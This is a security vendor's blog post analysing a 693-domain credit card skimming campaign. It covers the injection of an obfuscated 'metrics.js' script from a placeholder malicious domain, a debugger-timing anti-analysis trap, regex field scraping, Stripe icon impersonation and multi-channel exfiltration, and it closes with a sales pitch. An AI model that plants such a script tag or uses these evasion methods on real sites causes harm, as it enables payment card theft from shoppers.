SecurityMetrics forensic experts have identified a 700 site skimming operation using a sophisticated, multi-channel kit designed to lock out analysts and mimic legitimate payment providers.
Credit card skimming is no longer just about a few lines of messy code. Skimming now resembles intricate, well-planned threat campaigns.
Recently, the SecurityMetrics Forensic Analysis team identified a massive, synchronized campaign involving 693 active credit card skimmers.
What SecurityMetrics Forensic Analysts found beneath the surface was a technically advanced skimmer kit designed to evade detection, impersonate legitimate payment forms, and exfiltrate stolen card data through multiple redundant channels.
Because of our unique position in the industry, SecurityMetrics is currently the only entity with the data to link these disparate attacks to a single infrastructure fingerprint.
This campaign is defined by a highly deliberate infrastructure choice designed for rapid domain rotation and low cost per domain. All 693 malicious domains share a specific registration profile:
This combination provides a veneer of legitimacy, making automated blocklisting difficult. For security teams monitoring traffic, these are the registrar details associated with the threat:
REGISTRAR DETAILS
NiceNIC International Group Co., Limited • IANA #3765 • Hong Kong, China • abuse@nicenic.net
The skimmer is injected via an external <script> tag, disguised as a site metrics library. The attackers use a site-specific path—the victim’s own domain name as a subdirectory—to give each target its own payload endpoint:
HTML
<script type="text/javascript"
src="https://[maliciousdomain].top/[sitename]/metrics.js"
id="custom-[timestamp]-js"></script>
The payload is a JavaScript file heavily obfuscated using a control-flow flattening technique with hex-encoded variable names and a rotating string array, making standard signature-based detection nearly impossible.
Our forensic deep dive revealed several high-level functions that separate this kit from "run-of-the-mill" malware.
The skimmer employs a debugger-timing trap to identify if a human analyst is watching. It records a performance.now() timestamp, triggers a debugger; statement, and measures the elapsed time.
If the time exceeds a threshold (100ms), indicating a human has paused on the breakpoint, the skimmer writes a kill flag to localStorage and terminates execution. On subsequent loads, it checks for this flag and silently exits, effectively "locking out" security researchers from seeing the malicious logic.
The kit uses regex-based input field identification to catch data even on non-standard forms, scanning for attributes like card, expiry, or cvv. To complete the deception, it loads card brand icons directly from Stripe’s CDN (js.stripe.com). By rendering these icons alongside its own fields, it creates a convincing visual match for Stripe-powered checkout forms.
The skimmer deploys multiple MutationObserver instances to detect changes to the checkout page in real time.
This is where the campaign gets particularly aggressive. It uses a three-tier exfiltration strategy with automatic failover to ensure stolen data reaches the C2 (Command and Control) server:
This threat actor campaign isn't just stealing data– it's actually identifying victims.
The exfiltrated data object includes the user's browser agent and the compromised site's origin, allowing the operator to sort stolen credentials by merchant.
In a landscape where attackers are using professional-grade infrastructure, you need forensic-grade protection. SecurityMetrics consistently monitors and discovers data trends, like this skimming operation, so SecurityMetrics customers can rest assured their data is protected.
Talk to a SecurityMetrics forensic analyst expert today to protect your sensitive data.
.svg)
